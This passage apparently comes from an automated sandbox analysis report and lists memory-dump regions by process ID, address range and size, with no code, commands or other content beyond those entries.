                                                                                                      • memory/1512-128-0x0000000000000000-mapping.dmp
                                                                                                      • memory/1512-139-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/1764-248-0x0000000000000000-mapping.dmp
                                                                                                      • memory/2080-150-0x00000000022B5000-0x00000000022B7000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/2080-149-0x00000000022B4000-0x00000000022B5000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/2080-143-0x0000000000000000-mapping.dmp
                                                                                                      • memory/2080-146-0x00000000022B0000-0x00000000022B2000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/2080-148-0x00000000022B2000-0x00000000022B4000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/2168-349-0x0000000000000000-mapping.dmp
                                                                                                      • memory/2424-116-0x0000000000000000-mapping.dmp
                                                                                                      • memory/2424-118-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/2448-249-0x0000000000000000-mapping.dmp
                                                                                                      • memory/2448-254-0x00000000005A0000-0x00000000006EA000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.3MB

                                                                                                      • memory/2700-242-0x0000000000000000-mapping.dmp
                                                                                                      • memory/3016-262-0x0000000004460000-0x0000000004477000-memory.dmp
                                                                                                        Filesize

                                                                                                        92KB

                                                                                                      • memory/3156-366-0x0000000000A90000-0x0000000000A96000-memory.dmp
                                                                                                        Filesize

                                                                                                        24KB

                                                                                                      • memory/3156-367-0x0000000000A80000-0x0000000000A8C000-memory.dmp
                                                                                                        Filesize

                                                                                                        48KB

                                                                                                      • memory/3344-123-0x0000000000C40000-0x0000000000C42000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/3344-120-0x0000000000000000-mapping.dmp
                                                                                                      • memory/3560-131-0x0000000000000000-mapping.dmp
                                                                                                      • memory/3560-140-0x0000000003140000-0x0000000003142000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/3760-364-0x0000000000750000-0x0000000000755000-memory.dmp
                                                                                                        Filesize

                                                                                                        20KB

                                                                                                      • memory/3760-365-0x0000000000740000-0x0000000000749000-memory.dmp
                                                                                                        Filesize

                                                                                                        36KB

                                                                                                      • memory/3972-174-0x0000000000000000-mapping.dmp
                                                                                                      • memory/3996-190-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4052-141-0x0000000002920000-0x0000000002922000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4052-147-0x0000000002922000-0x0000000002924000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4052-151-0x0000000002925000-0x0000000002926000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4052-135-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4136-153-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4144-359-0x0000000000700000-0x000000000070C000-memory.dmp
                                                                                                        Filesize

                                                                                                        48KB

                                                                                                      • memory/4144-358-0x0000000000710000-0x0000000000717000-memory.dmp
                                                                                                        Filesize

                                                                                                        28KB

                                                                                                      • memory/4252-292-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4324-336-0x0000000005113000-0x0000000005114000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4324-333-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4324-334-0x0000000005112000-0x0000000005113000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4324-193-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4324-331-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4336-352-0x0000000005240000-0x000000000573E000-memory.dmp
                                                                                                        Filesize

                                                                                                        5.0MB

                                                                                                      • memory/4384-183-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4452-154-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4464-177-0x0000000001304000-0x0000000001305000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4464-158-0x0000000001300000-0x0000000001302000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4464-155-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4548-351-0x0000000007FD0000-0x0000000007FD1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4616-338-0x00000000072E2000-0x00000000072E3000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4616-337-0x00000000072E0000-0x00000000072E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4616-335-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4616-340-0x00000000072E3000-0x00000000072E4000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4648-159-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4656-208-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4716-241-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4716-164-0x00000000004C0000-0x000000000056E000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/4716-163-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/4716-160-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4756-301-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4844-165-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4872-202-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4908-167-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4984-253-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5040-171-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5164-361-0x0000000000790000-0x000000000079B000-memory.dmp
                                                                                                        Filesize

                                                                                                        44KB

                                                                                                      • memory/5164-360-0x00000000007A0000-0x00000000007A7000-memory.dmp
                                                                                                        Filesize

                                                                                                        28KB

                                                                                                      • memory/5204-244-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5244-357-0x0000000000400000-0x000000000049B000-memory.dmp
                                                                                                        Filesize

                                                                                                        620KB

                                                                                                      • memory/5252-291-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5276-243-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5316-297-0x000000000A020000-0x000000000A021000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-268-0x0000000006500000-0x0000000006501000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-273-0x0000000007420000-0x0000000007421000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-274-0x0000000007490000-0x0000000007491000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-275-0x0000000007800000-0x0000000007801000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-276-0x0000000007EA0000-0x0000000007EA1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-277-0x0000000007D10000-0x0000000007D11000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-286-0x0000000008E40000-0x0000000008E41000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-287-0x0000000008B00000-0x0000000008B01000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-288-0x0000000008B50000-0x0000000008B51000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-289-0x00000000094A0000-0x00000000094A1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-264-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5316-271-0x0000000006AE0000-0x0000000006AE1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-270-0x0000000006552000-0x0000000006553000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-269-0x0000000006B90000-0x0000000006B91000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-267-0x0000000006550000-0x0000000006551000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-272-0x00000000072B0000-0x00000000072B1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5316-303-0x0000000006553000-0x0000000006554000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5328-245-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5360-246-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5364-247-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5388-356-0x0000000000400000-0x00000000004AC000-memory.dmp
                                                                                                        Filesize

                                                                                                        688KB

                                                                                                      • memory/5388-355-0x0000000002020000-0x00000000020B1000-memory.dmp
                                                                                                        Filesize

                                                                                                        580KB

                                                                                                      • memory/5476-227-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5548-251-0x0000000001EF0000-0x0000000001F00000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/5548-250-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5548-252-0x0000000001F20000-0x0000000001F32000-memory.dmp
                                                                                                        Filesize

                                                                                                        72KB

                                                                                                      • memory/5556-228-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5628-229-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5652-230-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5724-231-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5732-255-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5736-257-0x0000000000402F68-mapping.dmp
                                                                                                      • memory/5736-256-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                        Filesize

                                                                                                        48KB

                                                                                                      • memory/5744-232-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5760-298-0x0000000010000000-0x0000000010116000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.1MB

                                                                                                      • memory/5760-290-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5788-315-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5800-263-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5804-316-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5832-353-0x0000000000C00000-0x0000000000C74000-memory.dmp
                                                                                                        Filesize

                                                                                                        464KB

                                                                                                      • memory/5832-354-0x0000000000950000-0x00000000009BB000-memory.dmp
                                                                                                        Filesize

                                                                                                        428KB

                                                                                                      • memory/5864-369-0x0000000000BD0000-0x0000000000BD9000-memory.dmp
                                                                                                        Filesize

                                                                                                        36KB

                                                                                                      • memory/5864-368-0x0000000000BE0000-0x0000000000BE4000-memory.dmp
                                                                                                        Filesize

                                                                                                        16KB

                                                                                                      • memory/5876-233-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5916-234-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5980-235-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6008-332-0x0000000004593000-0x0000000004594000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6008-327-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6008-330-0x0000000004592000-0x0000000004593000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6008-329-0x0000000004590000-0x0000000004591000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6020-362-0x0000000000380000-0x0000000000389000-memory.dmp
                                                                                                        Filesize

                                                                                                        36KB

                                                                                                      • memory/6020-363-0x0000000000370000-0x000000000037F000-memory.dmp
                                                                                                        Filesize

                                                                                                        60KB

                                                                                                      • memory/6056-339-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6056-341-0x0000000006D60000-0x0000000006D61000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6056-344-0x0000000006D63000-0x0000000006D64000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6056-342-0x0000000006D62000-0x0000000006D63000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6072-350-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6084-238-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6100-258-0x00000000048F0000-0x0000000004981000-memory.dmp
                                                                                                        Filesize

                                                                                                        580KB

                                                                                                      • memory/6100-239-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6100-260-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                        Filesize

                                                                                                        40.0MB

                                                                                                      • memory/6112-261-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6116-240-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6124-348-0x0000000004CB3000-0x0000000004CB4000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6124-343-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6124-346-0x0000000004CB2000-0x0000000004CB3000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/6124-345-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB